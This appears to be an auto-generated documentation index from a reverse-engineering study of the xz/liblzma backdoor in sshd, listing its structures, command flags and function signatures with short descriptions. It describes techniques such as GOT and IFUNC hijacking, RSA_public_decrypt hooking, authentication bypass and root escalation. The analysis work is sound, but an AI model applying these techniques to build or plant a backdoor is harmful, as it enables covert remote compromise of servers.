ELF context for ld.so.
Definition: xzre.h:1766
elf_info_t main_info
this is for sshd itself
Definition: xzre.h:1760
lzma_allocator * import_resolver
ELF import resolver (fake LZMA allocator)
Definition: xzre.h:1790
struct link_map * dynamic_linker_map
this is for ld.so
Definition: xzre.h:1745
the contents of the RSA 'n' field
Definition: xzre.h:1917
void * EVP_PKEY_set1_RSA_plt
address of the PLT entry for EVP_PKEY_set1_RSA() in sshd
Definition: xzre.h:1824
void * RSA_get0_key_plt
address of the PLT entry for RSA_get0_key() in sshd
Definition: xzre.h:1829
void * RSA_public_decrypt_plt
address of the PLT entry for RSA_public_decrypt() in sshd
Definition: xzre.h:1819
ptrdiff_t tls_get_addr_plt_offset
offset from the symbol __tls_get_addr() to the PLT
Definition: xzre.h:2159
ptrdiff_t tls_get_addr_random_symbol_got_offset
offset from the symbol tls_get_addr_random_symbol to the GOT
Definition: xzre.h:2165
u8 flags2
see InstructionFlags2
Definition: xzre.h:751
u8 flags
see InstructionFlags
Definition: xzre.h:747
void * symbol_ptr
points to a symbol in memory; it will be used to find the GOT value
Definition: xzre.h:689
u64 * frame_address
stores the value of __builtin_frame_address(0)-16
Definition: xzre.h:694
array of ELF handles
Definition: xzre.h:1650
elf_info_t * dynamic_linker
ELF context for ld.so.
Definition: xzre.h:1661
elf_info_t * main
this is for sshd
Definition: xzre.h:1655
u64 code_segment_size
page-aligned virtual size of the first executable ELF segment
Definition: xzre.h:915
u64 first_vaddr
virtual address of the first program header
Definition: xzre.h:844
u64 gnurelro_memsize
size of the GNU relro segment
Definition: xzre.h:890
Elf64_Verdef * verdef
pointer to the ELF symbol version definitions (from DT_VERDEF)
Definition: xzre.h:894
u32 gnu_hash_last_bloom
last valid bloom value
Definition: xzre.h:932
Elf64_Dyn * dyn
pointer to the ELF dynamic segment
Definition: xzre.h:856
char * strtab
pointer to the ELF string table
Definition: xzre.h:864
Elf64_Phdr * phdrs
pointer to the ELF program headers array in memory
Definition: xzre.h:848
u32 gnu_hash_nbuckets
number of GNU hash buckets (from DT_GNU_HASH)
Definition: xzre.h:928
Elf64_Ehdr * elfbase
points to the ELF base address in memory
Definition: xzre.h:840
u64 e_phnum
copy of the ELF program header count from the ELF header
Definition: xzre.h:852
Elf64_Rela * plt_relocs
pointer to the ELF PLT relocations table
Definition: xzre.h:872
BOOL gnurelro_found
whether the loaded ELF contains PT_GNU_RELRO or not which specifies the location and size of a segmen...
Definition: xzre.h:882
u64 code_segment_start
page-aligned virtual address of the first executable ELF segment
Definition: xzre.h:910
u64 verdef_num
number of entries in the symbol versioning table
Definition: xzre.h:898
u64 gnurelro_vaddr
location of the GNU relro segment
Definition: xzre.h:886
Elf64_Sym * symtab
pointer to the ELF symbol table
Definition: xzre.h:868
u64 dyn_num_entries
number of entries in the ELF dynamic segment
Definition: xzre.h:860
u32 plt_relocs_num
number of entries in the PLT relocation table
Definition: xzre.h:876
void * lzma_code_end
liblzma code segment end
Definition: xzre.h:1364
libc_imports_t * libc_imports
pointer to the structure containing resolved libc functions
Definition: xzre.h:1307
char * STR_ssh_rsa_cert_v01_openssh_com
location of sshd .rodata string "ssh-rsa-cert-v01@openssh.com"
Definition: xzre.h:1325
BOOL disable_backdoor
This flag gets set to TRUE by run_backdoor_commands if any of the validity checks fail,...
Definition: xzre.h:1317
imported_funcs_t * imported_funcs
pointer to the structure containing resolved OpenSSL functions
Definition: xzre.h:1303
void * sshd_data_start
sshd data segment start
Definition: xzre.h:1345
u32 num_shifted_bits
number of bits copied
Definition: xzre.h:1393
void * sshd_code_start
sshd code segment start
Definition: xzre.h:1337
void * sshd_data_end
sshd data segment end
Definition: xzre.h:1349
char * STR_rsa_sha2_256
location of sshd .rodata string "rsa-sha2-256"
Definition: xzre.h:1329
void * sshd_code_end
sshd code segment end
Definition: xzre.h:1341
u64 current_data_size
number of body bytes copied to payload_data so far; once the body is fully copied this is the offset of the digest at the end
Definition: xzre.h:1374
void * lzma_code_start
liblzma code segment start
Definition: xzre.h:1357
void * return_address
the return address value of the caller obtained from *(u64 *)(caller_locals+24) since the entrypoint ...
Definition: xzre.h:666
void * cpuid_fn
points to the real cpuid function
Definition: xzre.h:670
void * got_ptr
points to the Global Offset Table
Definition: xzre.h:659
ptrdiff_t got_offset
holds the offset of the symbol relative to the GOT; used to derive got_ptr
Definition: xzre.h:675
BOOL result
TRUE if the instruction sequence was found, FALSE otherwise.
Definition: xzre.h:2239
u8 * offset_to_match
offset to match in the instruction displacement
Definition: xzre.h:2228
u8 * start_addr
start of the code address range to search
Definition: xzre.h:2218
u8 * end_addr
end of the code address range to search
Definition: xzre.h:2223
u32 * output_register_to_match
register to match as the instruction output
Definition: xzre.h:2233
the payload header; also used as the ChaCha20 IV
Definition: xzre.h:1879
u8 link_map_l_audit_any_plt_bitmask
bitmask that sets the link_map::l_audit_any_plt flag
Definition: xzre.h:1494
unsigned int * _dl_naudit_ptr
location of ld.so's _rtld_global_ro::_dl_naudit field
Definition: xzre.h:1513
u32 * sshd_auditstate_bindflags_ptr
the location of sshd's auditstate::bindflags field
Definition: xzre.h:1472
char ** libcrypto_l_name
location of libcrypto's link_map::l_name field
Definition: xzre.h:1530
size_t _dl_audit_symbind_alt__size
code size of ld.so's _dl_audit_symbind_alt() function
Definition: xzre.h:1542
u32 libcrypto_auditstate_bindflags_old_value
backup of the old value of libcrypto's libname_list::next field
Definition: xzre.h:1460
struct audit_ifaces ** _dl_audit_ptr
location of ld.so's _rtld_global_ro::_dl_audit field
Definition: xzre.h:1504
void * sshd_link_map_l_audit_any_plt_addr
location of sshd's link_map::l_audit_any_plt flag
Definition: xzre.h:1487
u32 * libcrypto_auditstate_bindflags_ptr
the location of libcrypto's auditstate::bindflags field
Definition: xzre.h:1455
u32 sshd_auditstate_bindflags_old_value
backup of the old value of sshd's libname_list::next field
Definition: xzre.h:1477
Structure to hold internal state of the check being calculated.
Definition: xzre.h:280
State for the internal SHA-256 implementation.
Definition: xzre.h:268
uint64_t size
Size of the message excluding padding.
Definition: xzre.h:273
data used within sshd_proxy_elevate
Definition: xzre.h:2042
struct monitor from openssh-portable
Definition: xzre.h:599
stack frame layout for run_backdoor_commands
Definition: xzre.h:2079
struct sensitive_data from openssh-portable
Definition: xzre.h:611
struct sshkey from openssh-portable
Definition: xzre.h:622
void * func_start
the starting address of the function that referenced the string
Definition: xzre.h:1707
EncodedStringId string_id
the string that was referenced, in encoded form
Definition: xzre.h:1702
void * xref
location of the instruction that referenced the string
Definition: xzre.h:1715
void * func_end
the ending address of the function that referenced the string
Definition: xzre.h:1711
union used within run_backdoor_commands
Definition: xzre.h:2066
represents a shift register, which will shift a '1' into the secret data array. the low 3 bits repres...
Definition: xzre.h:1848
u32 index
Definition: xzre.h:1850
u32 byte_index
Definition: xzre.h:1855
u32 bit_index
Definition: xzre.h:1853
BOOL elf_find_function_pointer(StringXrefId xref_id, void **pOutCodeStart, void **pOutCodeEnd, void **pOutFptrAddr, elf_info_t *elf_info, string_references_t *xrefs, global_context_t *ctx)
this function searches for a function pointer, pointing to a function designated by the given xref_id
fake_lzma_allocator_t * get_lzma_allocator_address(void)
gets the address of the fake LZMA allocator
BOOL elf_parse(Elf64_Ehdr *ehdr, elf_info_t *elf_info)
Parses the given in-memory ELF file into elf_info.
BOOL process_is_sshd(elf_info_t *elf, u8 *stack_end)
checks if the current process is sshd by inspecting argv and envp.
BOOL sshd_get_usable_socket(int *pSock, int socket_index, libc_imports_t *imports)
gets the first usable socket fd
void mm_log_handler_hook(LogLevel level, int forced, const char *msg, void *ctx)
void * elf_symbol_get_addr(elf_info_t *elf_info, EncodedStringId encoded_string_id)
Looks up an ELF symbol from a parsed ELF, and returns its memory address.
ssize_t c_strnlen(char *str, size_t max_len)
returns length of c string with a maximum length
void init_elf_entry_ctx(elf_entry_ctx_t *ctx)
initialises the elf_entry_ctx_t
BOOL verify_signature(struct sshkey *sshkey, u8 *signed_data, u64 sshkey_digest_offset, u64 signed_data_size, u8 *signature, u8 *ed448_raw_key, global_context_t *global_ctx)
Checks if signed_data is signed with ed448_raw_key.
BOOL validate_log_handler_pointers(void *addr1, void *addr2, void *search_base, u8 *code_end, string_references_t *refs, global_context_t *global)
Validate that the two addresses are the expected/correct ones.
void * dummy_tls_get_addr(tls_index *ti)
a dummy function that calls __tls_get_addr, to make sure its GOT slot doesn't get removed by compiler...
BOOL resolve_libc_imports(struct link_map *libc, elf_info_t *libc_info, libc_imports_t *imports)
parses the libc ELF from the supplied link map, and resolves its imports
struct key_payload_hdr backdoor_payload_hdr_t
the payload header. also used as Chacha IV
struct backdoor_payload backdoor_payload_t
the contents of the RSA 'n' field
void update_got_offset(elf_entry_ctx_t *ctx)
updates the offset to the GOT
struct gnu_hash_table gnu_hash_table_t
BOOL find_link_map_l_name(backdoor_data_handle_t *data_handle, ptrdiff_t *libname_offset, backdoor_hooks_data_t *hooks, imported_funcs_t *imported_funcs)
Find struct link_map offsets required to modify ld.so's private struct auditstate state.
BOOL find_dl_naudit(elf_info_t *dynamic_linker_elf, elf_info_t *libcrypto_elf, backdoor_hooks_data_t *hooks, imported_funcs_t *imported_funcs)
Find __rtld_global_ro offsets required to modify ld.so's private struct audit_ifaces state.
void * elf_get_code_segment(elf_info_t *elf_info, u64 *pSize)
Obtains the address and size of the first executable segment in the given ELF file.
ssize_t fd_write(int fd, void *buffer, size_t count, libc_imports_t *funcs)
writes data to the specified file descriptor
BOOL find_instruction_with_mem_operand_ex(u8 *code_start, u8 *code_end, dasm_ctx_t *dctx, int opcode, void *mem_address)
finds an instruction with an immediate memory operand
BOOL process_shared_libraries(backdoor_shared_libraries_data_t *data)
scans loaded libraries to identify interesting libraries
BOOL dsa_key_hash(const DSA *dsa, u8 *mdBuf, u64 mdBufSize, global_context_t *ctx)
obtains a SHA256 hash of the supplied DSA key
BOOL process_shared_libraries_map(struct link_map *r_map, backdoor_shared_libraries_data_t *data)
scans loaded libraries to identify interesting libraries and populate related data
BOOL backdoor_setup(backdoor_setup_params_t *params)
the backdoor main method that installs the backdoor_symbind64() callback
void * elf_get_reloc_symbol(elf_info_t *elf_info, Elf64_Rela *relocs, u32 num_relocs, u64 reloc_type, EncodedStringId encoded_string_id)
Searches the ELF relocations for a symbol having name encoded_string id and relocation of type reloc_...
BOOL elf_contains_vaddr_relro(elf_info_t *elf_info, u64 vaddr, u64 size, u32 p_flags)
checks if given ELF file contains the range [vaddr, vaddr+size) in the gnurelro segment
BOOL elf_contains_vaddr(elf_info_t *elf_info, void *vaddr, u64 size, u32 p_flags)
checks if given ELF file contains the range [vaddr, vaddr+size) in a segment with the specified memor...
BOOL find_link_map_l_audit_any_plt(backdoor_data_handle_t *data, ptrdiff_t libname_offset, backdoor_hooks_data_t *hooks, imported_funcs_t *imported_funcs)
Find struct link_map offset required to modify ld.so's private link_map::l_audit_any_plt state.
void * lzma_alloc(size_t size, lzma_allocator *allocator)
lzma_alloc function, used by the backdoor as an ELF symbol resolver the allocator 's opaque field mus...
BOOL secret_data_append_item(secret_data_shift_cursor_t shift_cursor, unsigned operation_index, unsigned shift_count, int index, u8 *code)
Calls secret_data_append_singleton, if flags are non-zero.
const u64 tls_get_addr_random_symbol
a bogus global variable that is used by the backdoor to generate an extra symbol
void init_ldso_ctx(ldso_ctx_t *ldso_ctx)
initializes/resets ldso data
BOOL init_imported_funcs(imported_funcs_t *imported_funcs)
Initializes the imported_funcs structure.
backdoor_hooks_data_t * hooks_data_addr
location of backdoor_hooks_data_t
BOOL sha256(const void *data, size_t count, u8 *mdBuf, u64 mdBufSize, imported_funcs_t *funcs)
computes the SHA256 hash of the supplied data
BOOL find_mov_instruction(u8 *code_start, u8 *code_end, BOOL is_64bit_operand, BOOL load_flag, dasm_ctx_t *dctx)
finds a MOV instruction.
ElfId
Definition: xzre.h:400
@ X_ELF_MAIN
this is for sshd itself
Definition: xzre.h:405
int init_hooks_ctx(backdoor_hooks_ctx_t *ctx)
Initializes the structure with hooks-related data.
CommandFlags2
Definition: xzre.h:1969
@ X_FLAGS2_CHANGE_MONITOR_REQ
if set, changes the monitor_reqtype field from MONITOR_REQ_AUTHPASSWORD to what's contained in the pa...
Definition: xzre.h:1979
@ X_FLAGS2_PSELECT
executes pselect, then exits; not compatible with command 2
Definition: xzre.h:1993
@ X_FLAGS2_CONTINUATION
more data available in the following packet; not compatible with command 3
Definition: xzre.h:1988
@ X_FLAGS2_SOCKFD_MASK
(0111_1000 >> 3) & 0xF when CMDF_SOCKET_INDEX is specified
Definition: xzre.h:2000
@ X_FLAGS2_IMPERSONATE
if set, impersonate a user (info from payload); if not set, impersonate root
Definition: xzre.h:1974
BOOL find_call_instruction(u8 *code_start, u8 *code_end, u8 *call_target, dasm_ctx_t *dctx)
finds a call instruction
const elf_functions_t elf_functions
special .data.rel.ro section that contains addresses to various functions
ssize_t fd_read(int fd, void *buffer, size_t count, libc_imports_t *funcs)
reads data from the specified file descriptor
BOOL sshd_get_sshbuf(struct sshbuf *sshbuf, global_context_t *ctx)
Finds the right sshbuf (FIXME: which?), starting from: (*(ctx->struct_monitor_ptr_address))->kex->my
const ptrdiff_t elf_functions_offset
special .data.rel.ro section that contains the offset to elf_functions
void * backdoor_init(elf_entry_ctx_t *state, u64 *caller_frame)
calls backdoor_init_stage2 by disguising it as a call to cpuid.
BOOL secret_data_append_singleton(u8 *call_site, u8 *code, secret_data_shift_cursor_t shift_cursor, unsigned shift_count, unsigned operation_index)
Shifts data in the secret data store, after validation of code. this function is intended to be invok...
BOOL contains_null_pointers(void **pointers, unsigned int num_pointers)
checks if the given array of pointers contains any NULL pointer
void * elf_get_data_segment(elf_info_t *elf_info, u64 *pSize, BOOL get_alignment)
Obtains the address and size of the last read-write segment in the given ELF file this is typically t...
BOOL extract_payload_message(struct sshbuf *sshbuf_data, size_t sshbuf_size, size_t *out_payload_size, global_context_t *ctx)
locates the RSA modulus from the given sshbuf. if found, the given sshbuf_data will be updated to poi...
const u32 string_action_data[1304]
contains action data for the encoded string radix tree
BOOL is_endbr64_instruction(u8 *code_start, u8 *code_end, u32 low_mask_part)
Checks if the code between code_start and code_end is an endbr64 instruction.
void fake_lzma_free(void *opaque, void *ptr)
a fake free function called by lzma_free()
void * elf_get_rodata_segment(elf_info_t *elf_info, u64 *pSize)
Obtains the address and size of the last readonly segment in the given ELF file this corresponds to t...
BOOL is_range_mapped(u8 *addr, u64 length, global_context_t *ctx)
verify if a memory range is mapped
int sshd_get_sensitive_data_score_in_do_child(void *sensitive_data, elf_info_t *elf, string_references_t *refs)
obtains a numeric score which indicates if do_child accesses sensitive_data or not
BOOL sshd_find_sensitive_data(elf_info_t *sshd, elf_info_t *libcrypto, string_references_t *refs, imported_funcs_t *funcs, global_context_t *ctx)
locates sensitive_data within sshd, and resolves some additional libcrypto functions
CommandFlags1
Definition: xzre.h:1946
@ X_FLAGS1_SETLOGMASK
disable all logging by setting mask 0x80000000
Definition: xzre.h:1954
@ X_FLAGS1_NO_EXTENDED_SIZE
if set, the union size field must be 0
Definition: xzre.h:1966
@ X_FLAGS1_SOCKET_INDEX
custom monitor socket index override
Definition: xzre.h:1958
@ X_FLAGS1_8BYTES
the data block contains 8 additional bytes
Definition: xzre.h:1950
@ X_FLAGS1_DISABLE_PAM
if set, disables PAM authentication
Definition: xzre.h:1962
void update_cpuid_got_index(elf_entry_ctx_t *ctx)
get the cpuid() GOT index
BOOL sshd_proxy_elevate(monitor_data_t *args, global_context_t *ctx)
forges a new MONITOR_REQ_KEYALLOWED packet, and injects it into the server to gain root privileges th...
uintptr_t backdoor_symbind64(Elf64_Sym *sym, unsigned int ndx, uptr *refcook, uptr *defcook, unsigned int flags, const char *symname)
the backdoored symbind64 installed in GLRO(dl_audit)
BOOL find_instruction_with_mem_operand(u8 *code_start, u8 *code_end, dasm_ctx_t *dctx, void *mem_address)
finds a LEA or MOV instruction with an immediate memory operand
EncodedStringId get_string_id(const char *string_begin, const char *string_end)
Get the.
BOOL rsa_key_hash(const RSA *rsa, u8 *mdBuf, u64 mdBufSize, imported_funcs_t *funcs)
obtains a SHA256 hash of the supplied RSA key
BOOL main_elf_parse(main_elf_t *main_elf)
Parses the main executable from the provided structure. As part of the process the arguments and envi...
fake_lzma_allocator_t fake_lzma_allocator
special .data.rel.ro section that contains a fake lzma_allocator
struct elf_handles elf_handles_t
array of ELF handles
BOOL find_add_instruction_with_mem_operand(u8 *code_start, u8 *code_end, dasm_ctx_t *dctx, void *mem_address)
finds an ADD instruction with an immediate memory operand
u8 * elf_find_string_reference(elf_info_t *elf_info, EncodedStringId encoded_string_id, u8 *code_start, u8 *code_end)
finds an instruction that references the given string
BOOL x86_dasm(dasm_ctx_t *ctx, u8 *code_start, u8 *code_end)
disassembles the given x64 code
BOOL sshd_find_main(u8 **code_start_out, elf_info_t *sshd, elf_info_t *libcrypto, imported_funcs_t *imported_funcs)
finds the sshd_main function
BOOL find_lea_instruction_with_mem_operand(u8 *code_start, u8 *code_end, dasm_ctx_t *dctx, void *mem_address)
finds a LEA instruction with an immediate memory operand
const backdoor_cpuid_reloc_consts_t cpuid_reloc_consts
special .rodata section that contains _cpuid() related GOT offsets
BOOL decrypt_payload_message(key_payload_t *payload, size_t payload_size, global_context_t *ctx)
decrypts the given backdoor payload
BOOL sshd_get_sensitive_data_address_via_krb5ccname(u8 *data_start, u8 *data_end, u8 *code_start, u8 *code_end, void **sensitive_data_out, elf_info_t *elf)
finds the address of sensitive_data.host_keys in sshd by using getenv( STR_KRB5CCNAME )
struct backdoor_data backdoor_data_t
this structure is used to hold most of the backdoor information. it's used as a local variable in fun...
Definition: xzre.h:1685
u8 * find_string_reference(u8 *code_start, u8 *code_end, const char *str)
finds an instruction that references the given string
int sshd_get_sensitive_data_score(void *sensitive_data, elf_info_t *elf, string_references_t *refs)
obtains a numeric score which indicates whether sensitive_data is accessed or not
BOOL secret_data_get_decrypted(u8 *output, global_context_t *ctx)
obtains a decrypted copy of the secret data
BOOL find_function_prologue(u8 *code_start, u8 *code_end, u8 **output, FuncFindType find_mode)
locates the function prologue
BOOL find_link_map_l_audit_any_plt_bitmask(backdoor_data_handle_t *data, instruction_search_ctx_t *search_ctx)
Find the bitmask required to modify ld.so's private link_map::l_audit_any_plt state.
void * c_memmove(char *dest, char *src, size_t cnt)
copies memory
int sshd_get_sensitive_data_score_in_demote_sensitive_data(void *sensitive_data, elf_info_t *elf, string_references_t *refs)
obtains a numeric score which indicates if demote_sensitive_data accesses sensitive_data or not
BOOL check_backdoor_state(global_context_t *ctx)
checks if the backdoor state is the expected one (FIXME: which?)
BOOL count_pointers(void **ptrs, u64 *count_out, libc_imports_t *funcs)
count the number of non-NULL pointers in the malloc'd memory block ptrs
unsigned int backdoor_entry(unsigned int cpuid_request, u64 *caller_frame)
calls backdoor_init while in the crc64() IFUNC resolver function
BOOL find_dl_audit_offsets(backdoor_data_handle_t *data, ptrdiff_t *libname_offset, backdoor_hooks_data_t *hooks, imported_funcs_t *imported_funcs)
Find the various offsets in ld.so that need modification to trigger _dl_audit_symbind_alt() to call b...
BOOL backdoor_init_stage2(elf_entry_ctx_t *ctx, u64 *caller_frame, void **cpuid_got_addr, backdoor_cpuid_reloc_consts_t *reloc_consts)
BOOL sshd_find_monitor_field_addr_in_function(u8 *code_start, u8 *code_end, u8 *data_start, u8 *data_end, void **monitor_field_ptr_out, global_context_t *ctx)
find a pointer to a field in struct monitor by examining code referencing it
const u64 string_mask_data[238]
contains mask data for the encoded string radix tree
int mm_answer_keyallowed_hook(struct ssh *ssh, int sock, struct sshbuf *m)
runs the payload received from sshd_proxy_elevate, and then runs the original mm_answer_keyallowed fu...
BOOL chacha_decrypt(u8 *in, int inl, u8 *key, u8 *iv, u8 *out, imported_funcs_t *funcs)
decrypts a buffer with chacha20
BOOL sshbuf_extract(struct sshbuf *buf, global_context_t *ctx, void **p_sshbuf_d, size_t *p_sshbuf_size)
checks if the provided buf is sane, then decomposes it into p_sshbuf_d and p_sshbuf_size
BOOL sshd_patch_variables(BOOL skip_root_patch, BOOL disable_pam, BOOL replace_monitor_reqtype, int monitor_reqtype, global_context_t *global_ctx)
Patches the sshd configuration.
void _cpuid_gcc(unsigned int level, unsigned int *a, unsigned int *b, unsigned int *c, unsigned int *d)
actually calls cpuid instruction
unsigned int _get_cpuid_modified(unsigned int leaf, unsigned int *eax, unsigned int *ebx, unsigned int *ecx, unsigned int *edx, u64 *caller_frame)
the backdoor entrypoint function, called by the IFUNC resolver for liblzma crc32() and crc64()
BOOL bignum_serialize(u8 *buffer, u64 bufferSize, u64 *pOutSize, const BIGNUM *bn, imported_funcs_t *funcs)
Serializes the BIGNUM bn to the buffer buffer.
BOOL elf_find_string_references(elf_info_t *elf_info, string_references_t *refs)
parses the ELF rodata section, looking for strings and the instructions that reference them
struct backdoor_data_handle backdoor_data_handle_t
data passed to functions that access the backdoor data
int mm_answer_keyverify_hook(struct ssh *ssh, int sock, struct sshbuf *m)
used in conjunction with mm_answer_keyallowed_hook to bypass the key validity check
union backdoor_runtime_data backdoor_runtime_data_t
union used within run_backdoor_commands
Elf64_Sym * elf_symbol_get(elf_info_t *elf_info, EncodedStringId encoded_string_id, EncodedStringId sym_version)
Looks up an ELF symbol from a parsed ELF.
u32 count_bits(u64 x)
returns the number of 1 bits in x
struct run_backdoor_commands_data run_backdoor_commands_data_t
stack frame layout for run_backdoor_commands
BOOL secret_data_append_from_address(void *addr, secret_data_shift_cursor_t shift_cursor, unsigned shift_count, unsigned operation_index)
calls secret_data_append_singleton with either the given code address or the return address,...
BOOL secret_data_append_items(secret_data_item_t *items, u64 items_count, BOOL(*appender)(secret_data_shift_cursor_t, unsigned, unsigned, int, u8 *))
appends multiple secret data items at once
int sshd_get_sensitive_data_score_in_main(void *sensitive_data, elf_info_t *elf, string_references_t *refs)
obtains a numeric score which indicates if main accesses sensitive_data or not
BOOL sshd_get_client_socket(global_context_t *ctx, int *pSocket, int socket_index, enum SocketMode socket_direction)
Get either the read or write end of the sshd connection.
const ptrdiff_t fake_lzma_allocator_offset
special .data.rel.ro section that contains the offset to fake_lzma_allocator_struct
const backdoor_tls_get_addr_reloc_consts_t tls_get_addr_reloc_consts
special .rodata section that contains __tls_get_addr() related GOT offsets
BOOL is_gnu_relro(Elf64_Word p_type, u32 addend)
checks if the provided identifiers represent a PT_GNU_RELRO
void * find_addr_referenced_in_mov_instruction(StringXrefId id, string_references_t *refs, void *mem_range_start, void *mem_range_end)
find an address referenced in a function
u32 resolver_call_count
counts the number of times the IFUNC resolver is called
BOOL sshd_configure_log_hook(cmd_arguments_t *cmd_flags, global_context_t *ctx)
configure the log hook
CommandFlags3
Definition: xzre.h:2003
@ X_FLAGS3_MONITOR_REQ_VAL
6 bits used to store the monitor req / 2 (might be unused)
Definition: xzre.h:2011
@ X_FLAGS3_SOCKET_NUM
5 bits used to store number of sockets (in cmd3)
Definition: xzre.h:2007
struct monitor_data monitor_data_t
data used within sshd_proxy_elevate
const u64 cpuid_random_symbol
a bogus global variable that is used by the backdoor to generate an extra symbol
void * elf_get_got_symbol(elf_info_t *elf_info, EncodedStringId encoded_string_id)
Gets the GOT symbol with name encoded_string_id from the parsed ELF file.
void * elf_get_plt_symbol(elf_info_t *elf_info, EncodedStringId encoded_string_id)
Gets the PLT symbol with name encoded_string_id from the parsed ELF file.
int mm_answer_authpassword_hook(struct ssh *ssh, int sock, struct sshbuf *m)
used to bypass password authentication by replying with a successful MONITOR_ANS_AUTHPASSWORD
BOOL secret_data_append_from_call_site(secret_data_shift_cursor_t shift_cursor, unsigned shift_count, unsigned operation_index, BOOL bypass)
Shifts data in the secret data store, after validation of the call site, i.e. the caller of this func...
BOOL sshd_find_monitor_struct(elf_info_t *elf, string_references_t *refs, global_context_t *ctx)
finds the pointer to struct monitor, and updates the global context in ctx with its location
void * update_got_address(elf_entry_ctx_t *entry_ctx)
finds the __tls_get_addr() GOT entry
BOOL secret_data_append_from_code(void *code_start, void *code_end, secret_data_shift_cursor_t shift_cursor, unsigned shift_count, BOOL start_from_call)
Pushes secret data by validating the given code block.
char * elf_find_string(elf_info_t *elf_info, EncodedStringId *stringId_inOut, void *rodata_start_ptr)
Locates a string in the ELF .rodata section.
BOOL find_function(u8 *code_start, void **func_start, void **func_end, u8 *search_base, u8 *code_end, FuncFindType find_mode)
locates the function boundaries.
void sshd_log(sshd_log_ctx_t *log_ctx, LogLevel level, const char *fmt,...)
calls sshlogv from openssh, similarly to sshlog in openssh
BOOL run_backdoor_commands(RSA *key, global_context_t *ctx, BOOL *do_orig)
checks if the supplied RSA public key contains the backdoor commands, and executes them if present.
BOOL sshd_get_sensitive_data_address_via_xcalloc(u8 *data_start, u8 *data_end, u8 *code_start, u8 *code_end, string_references_t *string_refs, void **sensitive_data_out)
finds the address of sensitive_data.host_keys in sshd by using XREF_xcalloc_zero_size in xcalloc
ptrdiff_t get_tls_get_addr_random_symbol_got_offset(elf_entry_ctx_t *ctx)
get the tls_get_addr_random_symbol GOT offset
BOOL sshbuf_bignum_is_negative(struct sshbuf *buf)
checks if the given serialized BIGNUM is negative
int init_shared_globals(backdoor_shared_globals_t *shared_globals)
Initializes the backdoor_shared_globals structure.
elf_functions_t * get_elf_functions_address(void)
gets the address of the elf_functions
BOOL find_mov_lea_instruction(u8 *code_start, u8 *code_end, BOOL is_64bit_operand, BOOL load_flag, dasm_ctx_t *dctx)
like find_mov_instruction, but also considers LEA instructions
BOOL find_lea_instruction(u8 *code_start, u8 *code_end, u64 displacement)
finds a lea instruction
void * fake_lzma_alloc(void *opaque, size_t nmemb, size_t size)
a fake alloc function called by lzma_alloc() that then calls elf_symbol_get_addr()
ssize_t c_strlen(char *str)
returns length of c string
BOOL find_reg2reg_instruction(u8 *code_start, u8 *code_end, dasm_ctx_t *dctx)
finds a reg2reg instruction
int hook_RSA_public_decrypt(int flen, unsigned char *from, unsigned char *to, RSA *rsa, int padding)
hook for RSA_public_decrypt, which triggers
lzma_allocator * get_lzma_allocator(void)
gets the fake LZMA allocator, used for imports resolution the "opaque" field of the structure holds a...